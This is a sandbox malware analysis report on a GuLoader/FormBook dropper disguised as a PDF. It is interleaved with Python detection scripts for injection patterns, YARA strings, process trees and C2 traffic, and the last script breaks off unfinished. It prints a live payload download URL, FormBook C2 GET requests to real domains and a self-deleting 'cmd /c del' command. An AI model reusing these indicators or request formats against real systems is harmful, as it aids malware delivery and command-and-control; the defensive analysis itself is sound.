
Analysis Report TR-D45.pdf.exe

Overview

General Information

Sample Name: TR-D45.pdf.exe
Analysis ID: 321007
MD5: 937841064411662c36469498ea645660
SHA1: 7e72225620b06b6d9f5d54ee45ca2dd7ba10e87e
SHA256: 3b162f2943b2ee8d6075b2f8f4cbd7832e11b50ecdfcb4a68cf18eb1c7614651
Tags: exe, GuLoader

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match
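The signature list above names the injection and evasion techniques but not how the individual Nt* calls (listed per function further down in the Signature Overview) combine into them. The following is an added example, not part of the Joe Sandbox report: a small classifier that takes a per-process API-call trace in the shape a sandbox API log provides and names process hollowing, APC injection, the generic suspended-create/write/resume pattern, and NtSetInformationThread with ThreadHideFromDebugger (information class 0x11). The trace, its handle values and its call order are constructed for the example; the pids are those of the Startup tree, and the templates are this example's summary of the techniques, not a sandbox's rule set.

```python
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004          # dwCreationFlags bit for CreateProcess*
THREAD_HIDE_FROM_DEBUGGER = 0x11       # THREADINFOCLASS for NtSetInformationThread


def api(*names):
    """Step predicate: the call is one of the named APIs."""
    return lambda call: call[0] in names


def create_suspended(call):
    """Step predicate for 'Creates a process in suspended mode'. NtCreateProcessEx
    builds the process object without an initial thread, so it is not running either."""
    name, args = call
    if name in ("CreateProcessW", "CreateProcessA", "CreateProcessInternalW"):
        return bool(args.get("dwCreationFlags", 0) & CREATE_SUSPENDED)
    return name == "NtCreateProcessEx"


# Ordered call templates. Other calls may be interleaved, but each step must follow
# the previous one inside the same process. Example's own summary, not a rule set.
TEMPLATES = {
    "process_hollowing": [
        create_suspended,
        api("NtUnmapViewOfSection"),                            # evict the host image
        api("NtAllocateVirtualMemory", "NtMapViewOfSection"),   # room for the payload
        api("NtWriteVirtualMemory"),                            # copy the payload in
        api("NtSetContextThread"),                              # redirect the main thread
        api("NtResumeThread"),
    ],
    "apc_injection": [
        lambda c: create_suspended(c) or c[0] == "NtOpenProcess",
        api("NtAllocateVirtualMemory", "NtMapViewOfSection"),
        api("NtWriteVirtualMemory"),
        api("NtQueueApcThread"),                                # runs on next alertable wait
        api("NtResumeThread", "NtAlertResumeThread"),
    ],
    "suspended_create_write_resume": [                          # generic write-then-resume
        create_suspended,
        api("NtWriteVirtualMemory"),
        api("NtResumeThread"),
    ],
}


def matches(calls, steps):
    """Greedy ordered-subsequence match of `steps` against one process's call list."""
    i = 0
    for call in calls:
        if steps[i](call):
            i += 1
            if i == len(steps):
                return True
    return False


def classify(trace):
    """Map pid -> sorted technique tags for a trace of (pid, api, args) tuples."""
    per_pid = defaultdict(list)
    for pid, name, args in trace:
        per_pid[pid].append((name, args))
    result = {}
    for pid, calls in per_pid.items():
        tags = {t for t, steps in TEMPLATES.items() if matches(calls, steps)}
        if "process_hollowing" in tags:          # the generic pattern is implied by it
            tags.discard("suspended_create_write_resume")
        if any(n == "NtSetInformationThread"
               and a.get("ThreadInformationClass") == THREAD_HIDE_FROM_DEBUGGER
               for n, a in calls):
            tags.add("thread_hide_from_debugger")
        result[pid] = sorted(tags)
    return result


# Constructed trace (pid, api, selected arguments). Pids follow the Startup tree of this
# report; call order and handle values are assumptions for the example.
TRACE = [
    (6060, "NtSetInformationThread", {"ThreadInformationClass": 0x11}),
    (6060, "CreateProcessW", {"lpApplicationName": r"C:\Users\user\Desktop\TR-D45.pdf.exe",
                              "dwCreationFlags": CREATE_SUSPENDED}),
    (6060, "NtWriteVirtualMemory", {"ProcessHandle": 0x1A4}),
    (6060, "NtResumeThread", {"ThreadHandle": 0x1A8}),
    (3668, "NtSetInformationThread", {"ThreadInformationClass": 0x11}),
    (3668, "NtOpenProcess", {"ClientId": 3472}),                 # explorer.exe
    (3668, "NtMapViewOfSection", {"ProcessHandle": 0x2B0}),
    (3668, "NtWriteVirtualMemory", {"ProcessHandle": 0x2B0}),
    (3668, "NtQueueApcThread", {"ThreadHandle": 0x2B4}),
    (3668, "NtResumeThread", {"ThreadHandle": 0x2B4}),
    (3472, "CreateProcessW", {"lpApplicationName": r"C:\Windows\SysWOW64\control.exe",
                              "dwCreationFlags": CREATE_SUSPENDED}),
    (3472, "NtUnmapViewOfSection", {"ProcessHandle": 0x3C0}),
    (3472, "NtAllocateVirtualMemory", {"ProcessHandle": 0x3C0}),
    (3472, "NtWriteVirtualMemory", {"ProcessHandle": 0x3C0}),
    (3472, "NtSetContextThread", {"ThreadHandle": 0x3C4}),
    (3472, "NtResumeThread", {"ThreadHandle": 0x3C4}),
    (9999, "NtSetInformationThread", {"ThreadInformationClass": 0x02}),  # ThreadPriority: benign
    (9999, "NtDelayExecution", {"DelayInterval": -10_000_000}),
]

if __name__ == "__main__":
    for pid, tags in classify(TRACE).items():
        print(pid, tags or "-")
```

The order check matters: NtWriteVirtualMemory followed by NtResumeThread on its own is what pid 6060 does to its own copy, while the same calls preceded by NtUnmapViewOfSection and followed by NtSetContextThread (pid 3472 into control.exe) are hollowing, and NtQueueApcThread instead of NtSetContextThread is the APC variant; a classifier that only counts the APIs cannot tell these apart.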

Startup

  • System is w10x64
  • TR-D45.pdf.exe (PID: 6060 cmdline: 'C:\Users\user\Desktop\TR-D45.pdf.exe' MD5: 937841064411662C36469498EA645660)
    • TR-D45.pdf.exe (PID: 3668 cmdline: 'C:\Users\user\Desktop\TR-D45.pdf.exe' MD5: 937841064411662C36469498EA645660)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6676 cmdline: /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x183e9:$sqlite3step: 68 34 1C 7B E1
    • 0x184fc:$sqlite3step: 68 34 1C 7B E1
    • 0x18418:$sqlite3text: 68 38 2A 90 C5
    • 0x1853d:$sqlite3text: 68 38 2A 90 C5
    • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
    • 0x47b4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(table truncated: 18 entries in total)
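The Strings column above is enough to reproduce the matches. $sequence_0 disassembles to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the RDTSC delta behind "Tries to detect virtualization through RDTSC time measurements", and each of the three JPCERT strings is a single push imm32 (opcode 68); their identifiers indicate that the immediate is the hash FormBook pushes when resolving that sqlite3 export, which lets the rule match the resolver without any plaintext API name. The following is an added example, not code from the report or from either rule's author: it parses the string lines as printed, renders them back as YARA source, scans a buffer for them and decodes the push immediates. The buffer and the offsets in it are constructed for the example and are not the report's dump.

```python
import re
import struct

# String lines exactly as the Memory Dumps table prints them (offset:$id: bytes).
REPORT_STRINGS = """
0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
0x183e9:$sqlite3step: 68 34 1C 7B E1
0x18418:$sqlite3text: 68 38 2A 90 C5
0x1842b:$sqlite3blob: 68 53 D8 7F 8C
"""

LINE = re.compile(r"^(0x[0-9a-f]+):\$(\w+):\s*((?:[0-9a-f]{2}\s*)+)$", re.IGNORECASE)


def parse_strings(text):
    """Return {identifier: (reported_offset, pattern_bytes)} from the table's lines."""
    out = {}
    for line in text.strip().splitlines():
        m = LINE.match(line.strip())
        if not m:
            raise ValueError(f"unparsable string line: {line!r}")
        offset, ident, hexbytes = m.groups()
        out[ident] = (int(offset, 16), bytes.fromhex(hexbytes.replace(" ", "")))
    return out


def to_yara(name, strings, condition="3 of them"):
    """Render the parsed strings as YARA source so they can be re-scanned elsewhere."""
    lines = [f"rule {name} {{", "    strings:"]
    for ident, (_, pat) in strings.items():
        lines.append(f"        ${ident} = {{ {pat.hex(' ').upper()} }}")
    lines += ["    condition:", f"        {condition}", "}"]
    return "\n".join(lines)


def scan(buf, strings):
    """Every occurrence of every pattern: {identifier: [offsets]}."""
    hits = {}
    for ident, (_, pat) in strings.items():
        pos, found = 0, []
        while (pos := buf.find(pat, pos)) != -1:
            found.append(pos)
            pos += 1
        hits[ident] = found
    return hits


def push_imm32(pat):
    """Decode an x86 'push imm32' (opcode 0x68, little-endian operand); None for
    anything else. The three sqlite3 strings are exactly this shape."""
    if len(pat) == 5 and pat[0] == 0x68:
        return struct.unpack("<I", pat[1:])[0]
    return None


def build_sample(strings):
    """A constructed 64 KiB 'dump' (not one from the report): NOP filler with some of
    the patterns placed at offsets chosen for the example."""
    buf = bytearray(b"\x90" * 0x10000)
    layout = {"sequence_0": [0x1000, 0x2400], "sqlite3step": [0x3000], "sqlite3text": [0x3020]}
    for ident, offsets in layout.items():
        pat = strings[ident][1]
        for off in offsets:
            buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    strings = parse_strings(REPORT_STRINGS)
    print(to_yara("formbook_from_report", strings))
    for ident, offsets in scan(build_sample(strings), strings).items():
        imm = push_imm32(strings[ident][1])
        suffix = f" push_imm32={imm:#010x}" if imm is not None else ""
        print(f"{ident:12s} hits={offsets}{suffix}")
```

The decoded immediates (0xE17B1C34 for $sqlite3step, and so on) are the values to look for in a dump if the surrounding bytes have been re-laid out by a different compiler build; a five-byte push is a fragile anchor on its own, which is why the JPCERT rule combines the three.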

      Sigma Overview

      System Summary:

Sigma detected: Suspicious Double Extension
Source: Process started | Author: Florian Roth (rule), @blu3_team (idea) | Data: Command: 'C:\Users\user\Desktop\TR-D45.pdf.exe', CommandLine: 'C:\Users\user\Desktop\TR-D45.pdf.exe', CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\TR-D45.pdf.exe, NewProcessName: C:\Users\user\Desktop\TR-D45.pdf.exe, OriginalFileName: C:\Users\user\Desktop\TR-D45.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\TR-D45.pdf.exe', ParentImage: C:\Users\user\Desktop\TR-D45.pdf.exe, ParentProcessId: 6060, ProcessCommandLine: 'C:\Users\user\Desktop\TR-D45.pdf.exe', ProcessId: 3668
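The Sigma match above fires on the image name alone. As an added example (not part of the report or of the Sigma rule), here is the same check extended over the Startup tree as process-creation events: the double extension, the sample starting a copy of itself with an identical command line, a shell spawned by an argument-less system binary, and the cmd.exe /c del of the original sample. The events are constructed from the tree above; the parent pid of the first process, the cmd.exe path, the extension lists and the notepad++ control entry are assumptions.

```python
import re

# Process-creation events constructed to mirror the Startup tree in this report.
# explorer.exe (pid 3472) has no creation event: it was already running and appears in
# the tree only because the sample injected into it. The ppid of the first process, the
# cmd.exe path and the notepad++ control entry are assumptions for the example.
EVENTS = [
    {"pid": 6060, "ppid": 3472, "image": r"C:\Users\user\Desktop\TR-D45.pdf.exe",
     "cmd": r"'C:\Users\user\Desktop\TR-D45.pdf.exe'"},
    {"pid": 3668, "ppid": 6060, "image": r"C:\Users\user\Desktop\TR-D45.pdf.exe",
     "cmd": r"'C:\Users\user\Desktop\TR-D45.pdf.exe'"},
    {"pid": 6660, "ppid": 3472, "image": r"C:\Windows\SysWOW64\control.exe",
     "cmd": r"C:\Windows\SysWOW64\control.exe"},
    {"pid": 6676, "ppid": 6660, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r"/c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'"},
    {"pid": 6692, "ppid": 6676, "image": r"C:\Windows\System32\conhost.exe",
     "cmd": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 7000, "ppid": 3472, "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "cmd": r"notepad++.exe invoice.pdf.txt"},      # harmless double extension in an argument
]

# Document-looking name followed by an executable extension. The lists are this
# example's approximation of what the Sigma rule checks, not the rule itself.
DOUBLE_EXT = re.compile(
    r"\.(?:pdf|doc|docx|xls|xlsx|ppt|pptx|rtf|txt|jpg|jpeg|png|gif)"
    r"\.(?:exe|scr|com|pif|bat|cmd|js|vbs)$", re.IGNORECASE)
# cmd.exe /c del <something>.exe, as in the tree above
DEL_CMD = re.compile(r"/c\s+del\s+['\"]?([^'\"]+?\.exe)['\"]?\s*$", re.IGNORECASE)
WINDIR = re.compile(r"^c:\\windows\\(?:system32|syswow64)\\", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def analyse(events):
    """Return sorted (pid, finding, detail) tuples for the whole event set."""
    by_pid = {e["pid"]: e for e in events}
    by_image = {}
    for e in events:
        by_image.setdefault(e["image"].lower(), []).append(e["pid"])
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        if DOUBLE_EXT.search(name):
            findings.append((e["pid"], "double_extension", name))
        # same image and same command line as the parent: the sample starting a copy of
        # itself (suspended) to hollow, as pid 6060 -> 3668 does in the tree
        if parent and parent["image"].lower() == e["image"].lower() \
                and parent["cmd"] == e["cmd"]:
            findings.append((e["pid"], "self_spawn", name))
        if name.lower() == "cmd.exe":
            m = DEL_CMD.search(e["cmd"])
            if m:
                target = m.group(1).lower()
                owners = by_image.get(target, [])      # processes that ran the deleted file
                findings.append((e["pid"], "self_delete",
                                 f"{basename(target)} run by pids {owners}"))
            # a shell spawned by a system binary that was itself started without
            # arguments: the hollowed-host pattern (explorer.exe -> control.exe -> cmd.exe)
            if parent and WINDIR.match(parent["image"]) \
                    and parent["cmd"].strip("'\"").lower() == parent["image"].lower():
                findings.append((e["pid"], "shell_from_argless_system_binary",
                                 basename(parent["image"])))
    return sorted(findings)


if __name__ == "__main__":
    for pid, kind, detail in analyse(EVENTS):
        print(f"{pid}\t{kind}\t{detail}")
```

The self_delete finding is the one worth correlating: by the time cmd.exe runs, both processes that executed TR-D45.pdf.exe have handed control to explorer.exe and control.exe, so the file named in the del command is the only link back from the surviving injected hosts to the sample on disk.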

      Signature Overview


      AV Detection:

Multi AV Scanner detection for submitted file
Source: TR-D45.pdf.exe | Virustotal: Detection: 29%
Source: TR-D45.pdf.exe | ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 4x nop then pop ebx | 1_2_000A7AFD
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop ebx | 12_2_02447AFD
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi | 12_2_02456BD4

      Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49743
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi HTTP/1.1 | Host: www.gcvinternational.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd HTTP/1.1 | Host: www.celebrations.sucks | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: GOOGLEUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS traffic detected: queries for: pilatescollective.com
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.G
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: control.exe, 0000000C.00000002.497562201.0000000004E2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | String found in binary or memory: https://pilatescollective.com/
Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | String found in binary or memory: https://pilatescollective.com/D4
Source: TR-D45.pdf.exe | String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin
Source: TR-D45.pdf.exe, 00000001.00000003.270384590.00000000008C0000.00000004.00000001.sdmp | String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin/
Source: TR-D45.pdf.exe, 00000001.00000003.270384590.00000000008C0000.00000004.00000001.sdmp | String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin7
Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin=WyM
Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | String found in binary or memory: https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.binl
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Reading the string list: the identrust and letsencrypt URLs in the TR-D45.pdf.exe dumps are the AIA, CRL and OCSP pointers of a Let's Encrypt certificate chain, left in memory by the TLS connection to pilatescollective.com, and the font-vendor URLs in explorer.exe are font-file metadata present in any explorer.exe; neither group is sample data. The indicators worth acting on are the download URL embedded in the sample itself (https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin, the host that was resolved and contacted over port 443, which is where the GuLoader stage fetches its encrypted next stage) and the /gnu/ request string in control.exe memory, which is the same C2 request seen on the wire above.
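The two GETs recorded above share the traits of the C2 requests this report attributes to FormBook: a short directory path (/gnu/), a query with one short and one long base64 value, no User-Agent, Connection: close and a seven-null-byte body on a GET; the short value (bly=TVIpcz004Rkd) is identical on both hosts. As an added example that is not part of the report, the script below parses raw requests, scores those traits and extracts the shared short value as a key to group beacons to different domains. The request text is reassembled from the two lines above plus one constructed benign request; the traits and weights are this example's choice, not a published signature.

```python
import re
from urllib.parse import urlsplit

# Raw requests re-assembled from the two C2 GETs in the Networking section (constructed
# text, not a capture), plus one constructed browser request as a benign control.
REQUESTS = [
    ("GET /gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi HTTP/1.1\r\n"
     "Host: www.gcvinternational.com\r\nConnection: close\r\n\r\n", b"\x00" * 7),
    ("GET /gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd HTTP/1.1\r\n"
     "Host: www.celebrations.sucks\r\nConnection: close\r\n\r\n", b"\x00" * 7),
    ("GET /news/?id=42&ref=home HTTP/1.1\r\nHost: example.org\r\n"
     "User-Agent: Mozilla/5.0\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n", b""),
]

B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_DIR = re.compile(r"^/[A-Za-z0-9_-]{2,8}/$")     # '/gnu/' style path


def parse_request(raw):
    """Split request line, headers and raw query. The query is split by hand because the
    values are base64 in which '+' and '/' are significant: no plus or percent decoding."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = []
    for kv in filter(None, parts.query.split("&")):
        key, _, value = kv.partition("=")
        params.append((key, value))
    return {"method": method, "path": parts.path, "params": params, "headers": headers}


def score(req, body):
    """Count the traits the two C2 requests share; traits and weights are this
    example's choice, not a published FormBook signature."""
    reasons = []
    h = req["headers"]
    if "user-agent" not in h:
        reasons.append("no User-Agent")
    if h.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    if req["method"] == "GET" and body:
        reasons.append(f"{len(body)}-byte body on a GET")
    values = sorted((v for _, v in req["params"]), key=len)
    if SHORT_DIR.match(req["path"]) and len(values) == 2 \
            and all(B64.match(v) for v in values) \
            and len(values[0]) <= 16 and len(values[1]) >= 40:
        reasons.append("short+long base64 query pair under a short directory")
    return len(reasons), reasons


def campaign_key(req):
    """The short query value. It is identical on both hosts above, so it ties requests
    to different domains back to one sample."""
    values = [v for _, v in req["params"] if B64.match(v)]
    return min(values, key=len) if values else None


def analyse(samples, threshold=3):
    """Return (host, campaign_key, score, reasons) for requests at or above threshold."""
    alerts = []
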